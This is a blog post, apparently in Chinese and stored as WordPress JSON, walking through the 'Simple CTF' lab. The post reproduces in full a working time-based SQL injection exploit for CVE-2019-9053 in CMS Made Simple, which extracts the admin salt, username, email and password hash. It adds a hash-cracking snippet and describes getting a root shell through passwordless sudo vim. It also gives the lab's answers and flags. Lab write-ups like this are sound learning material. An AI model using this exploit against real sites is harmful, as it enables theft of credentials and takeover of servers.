![\"\"](\"https:\/\/pic2.imgdb.cn\/item\/6448effe0d2dde5777d4ac3a.jpg\")
<\/p>\nHow many services are running under port 1000?<\/p>\n
<\/p>\n
2<\/code><\/pre>\nWhat is running on the higher port?<\/p>\n
![\"\"](\"https:\/\/pic2.imgdb.cn\/item\/6448f0a50d2dde5777d5cb53.jpg\")
<\/p>\n
ssh<\/code><\/pre>\nWhat's the CVE you're using against the application? <\/p>\n
\u626b\u4e00\u4e0b\u53d1\u73b0simple\u8fd9\u4e2a\u76ee\u5f55\uff0c\u8bbf\u95ee\u53d1\u73b0\u662fCMS Made Simple<\/p>\n
\u4e8e\u662f\u5c31\u627e\u5230\u4e86<\/p>\n
CVE-2019-9053<\/code><\/pre>\nTo what kind of vulnerability is the application vulnerable?<\/p>\n
CVE-2019-9053\u662f\u4e2asql\u6ce8\u5165\u7684\u6f0f\u6d1e<\/p>\n
sqli<\/code><\/pre>\nWhat's the password?<\/p>\n
\u7f51\u4e0a\u627e\u4e86\u4e2a\u5229\u7528\u811a\u672c<\/p>\n
#!\/usr\/bin\/env python\n# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9\n# Date: 30-03-2019\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https:\/\/www.cmsmadesimple.org\/\n# Software Link: https:\/\/www.cmsmadesimple.org\/downloads\/cmsms\/\n# Version: <= 2.2.9\n# Tested on: Ubuntu 18.04 LTS\n# CVE : CVE-2019-9053\n\nimport requests\nfrom termcolor import colored\nimport time\nfrom termcolor import cprint\nimport optparse\nimport hashlib\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action="store", dest="url",\n help="Base target uri (ex. http:\/\/10.10.10.100\/cms)")\nparser.add_option('-w', '--wordlist', action="store",\n dest="wordlist", help="Wordlist for crack admin password")\nparser.add_option('-c', '--crack', action="store_true", dest="cracking",\n help="Crack password with wordlist", default=False)\n\noptions, args = parser.parse_args()\nif not options.url:\n print("[+] Specify an url target")\n print("[+] Example usage (no cracking password): exploit.py -u http:\/\/target-uri")\n print("[+] Example usage (with cracking password): exploit.py -u http:\/\/target-uri --crack -w \/path-wordlist")\n print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")\n exit()\n\nurl_vuln = options.url + '\/moduleinterface.php?mact=News,m1_,default,0'\nsession = requests.Session()\ndictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'\nflag = True\npassword = ""\ntemp_password = ""\nTIME = 1\ndb_name = ""\noutput = ""\nemail = ""\n\nsalt = ''\nwordlist = ""\nif options.wordlist:\n wordlist += options.wordlist\n\ndef crack_password():\n global password\n global output\n global wordlist\n global salt\n dict = open(wordlist)\n for line in dict.readlines():\n line = line.replace("\\n", "")\n beautify_print_try(line)\n if hashlib.md5(str(salt) + line).hexdigest() == password:\n output += "\\n[+] Password cracked: " + line\n break\n dict.close()\n\ndef beautify_print_try(value):\n global output\n print("\\033c")\n cprint(output, 'green', attrs=['bold'])\n cprint('[*] Try: ' + value, 'red', attrs=['bold'])\n\ndef beautify_print():\n global output\n print("\\033c")\n cprint(output, 'green', attrs=['bold'])\n\ndef dump_salt():\n global flag\n global salt\n global output\n ord_salt = ""\n ord_salt_temp = ""\n while flag:\n flag = False\n for i in range(0, len(dictionary)):\n temp_salt = salt + dictionary[i]\n ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]\n beautify_print_try(temp_salt)\n payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + \\\n ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"\n url = url_vuln + "&m1_idlist=" + payload\n start_time = time.time()\n r = session.get(url)\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n salt = temp_salt\n ord_salt = ord_salt_temp\n flag = True\n output += '\\n[+] Salt for password found: ' + salt\n\ndef dump_password():\n global flag\n global password\n global output\n ord_password = ""\n ord_password_temp = ""\n while flag:\n flag = False\n for i in range(0, len(dictionary)):\n temp_password = password + dictionary[i]\n ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]\n beautify_print_try(temp_password)\n payload = "a,b,1,5))+and+(select+sleep(" + \\\n str(TIME) + ")+from+cms_users"\n payload += "+where+password+like+0x" + \\\n ord_password_temp + "25+and+user_id+like+0x31)+--+"\n url = url_vuln + "&m1_idlist=" + payload\n start_time = time.time()\n r = session.get(url)\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n password = temp_password\n ord_password = ord_password_temp\n flag = True\n output += '\\n[+] Password found: ' + password\n\ndef dump_username():\n global flag\n global db_name\n global output\n ord_db_name = ""\n ord_db_name_temp = ""\n while flag:\n flag = False\n for i in range(0, len(dictionary)):\n temp_db_name = db_name + dictionary[i]\n ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]\n beautify_print_try(temp_db_name)\n payload = "a,b,1,5))+and+(select+sleep(" + str(\n TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"\n url = url_vuln + "&m1_idlist=" + payload\n start_time = time.time()\n r = session.get(url)\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n db_name = temp_db_name\n ord_db_name = ord_db_name_temp\n output += '\\n[+] Username found: ' + db_name\n flag = True\n\ndef dump_email():\n global flag\n global email\n global output\n ord_email = ""\n ord_email_temp = ""\n while flag:\n flag = False\n for i in range(0, len(dictionary)):\n temp_email = email + dictionary[i]\n ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]\n beautify_print_try(temp_email)\n payload = "a,b,1,5))+and+(select+sleep(" + str(\n TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"\n url = url_vuln + "&m1_idlist=" + payload\n start_time = time.time()\n r = session.get(url)\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n email = temp_email\n ord_email = ord_email_temp\n output += '\\n[+] Email found: ' + email\n flag = True\n\ndump_salt()\ndump_username()\ndump_email()\ndump_password()\n\nif options.cracking:\n print(colored("[*] Now try to crack password"))\n crack_password()\n\nbeautify_print()<\/code><\/pre>\n\u8dd1\u4e00\u4e0b\u5f97\u5230\u7ed3\u679c(\u672a\u89e3\u5bc6)<\/p>\n
![\"\"](\"https:\/\/pic2.imgdb.cn\/item\/6448f7730d2dde5777e16d69.jpg\")
<\/p>\n
\u521a\u5fd8\u9009\u7206\u7834\u4e86\uff0c\u624b\u52a8\u64cd\u4f5c\u4e0b<\/p>\n
import hashlib\nf = open('\u5f31\u53e3\u4ee4.txt').read().splitlines()\nfor i in f:\n data = '1dac0d92e9fa6bb2'+i\n if hashlib.md5(data.encode()).hexdigest() == '0c01f4468bd75d7a84c7eb73846e8d96':\n print(i)\n break<\/code><\/pre>\n\u5f97\u5230\u5bc6\u7801<\/p>\n
secret<\/code><\/pre>\nWhere can you login with the details obtained?<\/p>\n
ssh<\/code><\/pre>\nWhat's the user flag?<\/p>\n
ssh\u767b\u4e0a\u4e4b\u540e\u70b9\u51fb\u5c31\u9001<\/p>\n
G00d j0b, keep up!<\/code><\/pre>\nIs there any other user in the home directory? What's its name?<\/p>\n
sunbath<\/code><\/pre>\nWhat can you leverage to spawn a privileged shell?<\/p>\n
\u60f3\u5230\u4e86\u4eca\u5929\u505a\u7684Pickle Rick\uff0c\u4e8e\u662f\u8f93\u4e86\u4e0bsudo -l<\/p>\n
![\"\"](\"https:\/\/pic2.imgdb.cn\/item\/6448fb0f0d2dde5777e6a98d.jpg\")
<\/p>\n
\u53d1\u73b0\u8fd9\u91cc\u53ef\u4ee5\u4e0d\u7528\u5bc6\u7801\u6765\u4ee5root\u8eab\u4efd\u6253\u5f00vim\uff0c\u5c31\u53ef\u4ee5\u53bbhttps:\/\/gtfobins.github.io\/#\u4e0a\u627e\u627e\u6709\u6ca1\u6709\u529e\u6cd5\u751f\u6210root\u7684shell<\/p>\n
vim<\/code><\/pre>\nWhat's the root flag?<\/p>\n
\u4f9d\u7167\u4e0a\u9762\u7684\u7f51\u7ad9\u6210\u529f\u83b7\u5f97rootshell<\/p>\n
![\"\"](\"https:\/\/pic2.imgdb.cn\/item\/6448fc070d2dde5777e7e97a.jpg\")
<\/p>\n
W3ll d0n3. You made it!<\/code><\/pre>\n\nclash\u6362\u4e86\u7c73\u56fd\u8282\u70b9\u540eopenvpn\u518d\u9009\u7c73\u56fd\u597d\u50cf\u7f51\u7edc\u8d28\u91cf\u5c31\u8fd8\u53ef\u4ee5\u63a5\u53d7\u4e86\uff0c\u597d\u4e2d\u597d<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"
Simple CTF How many services are running under port 1000? 2 What is running on the higher port? ssh What’s the CVE you’re using against the application? \u626b\u4e00\u4e0b\u53d1\u73b0simple\u8fd9\u4e2a\u76ee\u5f55\uff0c\u8bbf\u95ee\u53d1\u73b0\u662fCMS Made Simple \u4e8e\u662f\u5c31\u627e\u5230\u4e86 CVE […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-200","post","type-post","status-publish","format-standard","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=200"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/200\/revisions"}],"predecessor-version":[{"id":201,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/200\/revisions\/201"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}